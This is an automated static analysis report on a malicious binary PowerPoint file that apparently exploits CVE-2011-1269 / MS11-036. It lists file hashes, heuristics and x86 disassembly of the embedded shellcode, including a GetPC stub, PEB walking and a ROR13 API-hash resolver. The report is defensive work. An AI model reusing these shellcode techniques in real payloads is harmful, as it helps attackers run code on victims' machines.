Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46f9c4734befb9f6…

MALICIOUS

Office (OLE)

616.5 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint First seen: 2026-06-16
MD5: 4c5a3377c814921c7d98551b8df1c3f2 SHA-1: a4c226085cabc69ef443a9547b167080ba023155 SHA-256: 46f9c4734befb9f6cf27f5fb9f926754dfa9be69ade6765081055776e8f6f618
280 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD' indicates exploitation of CVE-2011-1269 / MS11-036, a known vulnerability in PowerPoint that allows for remote code execution. The presence of heuristics related to PEB access, API hash resolution, VirtualAlloc, LoadLibrary, and GetProcAddress suggests the execution of shellcode that likely performs process injection or loads additional malicious components. No document body or script content was available for further analysis.

Heuristics 7

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    x86 disassembly · validity: code (0.929) — 3/3 branch targets land on an instruction boundary (100% coherence)
    00000F51  e800000000        call 0xf56
00000F56  58                pop eax
00000F57  83e8fb            sub eax, -5
00000F5A  c3                ret
00000F5B  f3a4              rep movsb byte ptr es:[edi], byte ptr [esi]
00000F5D  33c0              xor eax, eax
00000F5F  8bcb              mov ecx, ebx
00000F61  f3aa              rep stosb byte ptr es:[edi], al
00000F63  5f                pop edi
00000F64  5e                pop esi
00000F65  ff7704            push dword ptr [edi + 4]
00000F68  ff560c            call dword ptr [esi + 0xc]
00000F6B  8d9e4c020000      lea ebx, [esi + 0x24c]
00000F71  53                push ebx
00000F72  ff5624            call dword ptr [esi + 0x24]
00000F75  c6040322          mov byte ptr [ebx + eax], 0x22
00000F79  c644030100        mov byte ptr [ebx + eax + 1], 0
00000F7E  83eb20            sub ebx, 0x20
00000F81  c7431c65202022    mov dword ptr [ebx + 0x1c], 0x22202065
00000F88  c74318742e6578    mov dword ptr [ebx + 0x18], 0x78652e74
00000F8F  c743146572706e    mov dword ptr [ebx + 0x14], 0x6e707265
00000F96  c7431020706f77    mov dword ptr [ebx + 0x10], 0x776f7020
00000F9D  c7430c74617274    mov dword ptr [ebx + 0xc], 0x74726174
00000FA4  c743082f632073    mov dword ptr [ebx + 8], 0x7320632f
00000FAB  c7                .byte 0xc7
00000FAC  43                inc ebx
00000FAD  0465              add al, 0x65
00000FAF  7865              js 0x1016
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: uncertain (0.504) — 8/10 branch targets land on an instruction boundary (80% coherence)
    00000FED  64a130000000      mov eax, dword ptr fs:[0x30]
00000FF3  85c0              test eax, eax
00000FF5  7813              js 0x100a
00000FF7  3e8b400c          mov eax, dword ptr ds:[eax + 0xc]
00000FFB  3e8b701c          mov esi, dword ptr ds:[eax + 0x1c]
00000FFF  ad                lodsd eax, dword ptr [esi]
00001000  3e8b5e08          mov ebx, dword ptr ds:[esi + 8]
00001004  3e8b6808          mov ebp, dword ptr ds:[eax + 8]
00001008  eb0d              jmp 0x1017
0000100A  3e8b4034          mov eax, dword ptr ds:[eax + 0x34]
0000100E  3e8ba8b8000000    mov ebp, dword ptr ds:[eax + 0xb8]
00001015  33db              xor ebx, ebx
00001017  8bc5              mov eax, ebp
00001019  5e                pop esi
0000101A  5d                pop ebp
0000101B  c20400            ret 4
0000101E  53                push ebx
0000101F  55                push ebp
00001020  56                push esi
00001021  57                push edi
00001022  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
00001027  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
0000102B  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
00001030  03d5              add edx, ebp
00001032  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
00001036  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
0000103A  03dd              add ebx, ebp
0000103C  e338              jecxz 0x1076
0000103E  49                dec ecx
0000103F  3e8b348b          mov esi, dword ptr ds:[ebx + ecx*4]
00001043  03f5              add esi, ebp
00001045  33ff              xor edi, edi
00001047  fc                cld
00001048  33c0              xor eax, eax
0000104A  ac                lodsb al, byte ptr [esi]
0000104B  3ac4              cmp al, ah
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: uncertain (0.504) — 8/10 branch targets land on an instruction boundary (80% coherence)
    00000FED  64a130000000      mov eax, dword ptr fs:[0x30]
00000FF3  85c0              test eax, eax
00000FF5  7813              js 0x100a
00000FF7  3e8b400c          mov eax, dword ptr ds:[eax + 0xc]
00000FFB  3e8b701c          mov esi, dword ptr ds:[eax + 0x1c]
00000FFF  ad                lodsd eax, dword ptr [esi]
00001000  3e8b5e08          mov ebx, dword ptr ds:[esi + 8]
00001004  3e8b6808          mov ebp, dword ptr ds:[eax + 8]
00001008  eb0d              jmp 0x1017
0000100A  3e8b4034          mov eax, dword ptr ds:[eax + 0x34]
0000100E  3e8ba8b8000000    mov ebp, dword ptr ds:[eax + 0xb8]
00001015  33db              xor ebx, ebx
00001017  8bc5              mov eax, ebp
00001019  5e                pop esi
0000101A  5d                pop ebp
0000101B  c20400            ret 4
0000101E  53                push ebx
0000101F  55                push ebp
00001020  56                push esi
00001021  57                push edi
00001022  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
00001027  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
0000102B  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
00001030  03d5              add edx, ebp
00001032  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
00001036  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
0000103A  03dd              add ebx, ebp
0000103C  e338              jecxz 0x1076
0000103E  49                dec ecx
0000103F  3e8b348b          mov esi, dword ptr ds:[ebx + ecx*4]
00001043  03f5              add esi, ebp
00001045  33ff              xor edi, edi
00001047  fc                cld
00001048  33c0              xor eax, eax
0000104A  ac                lodsb al, byte ptr [esi]
0000104B  3ac4              cmp al, ah
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Open this report in the interactive analyzer, or submit your own file for analysis.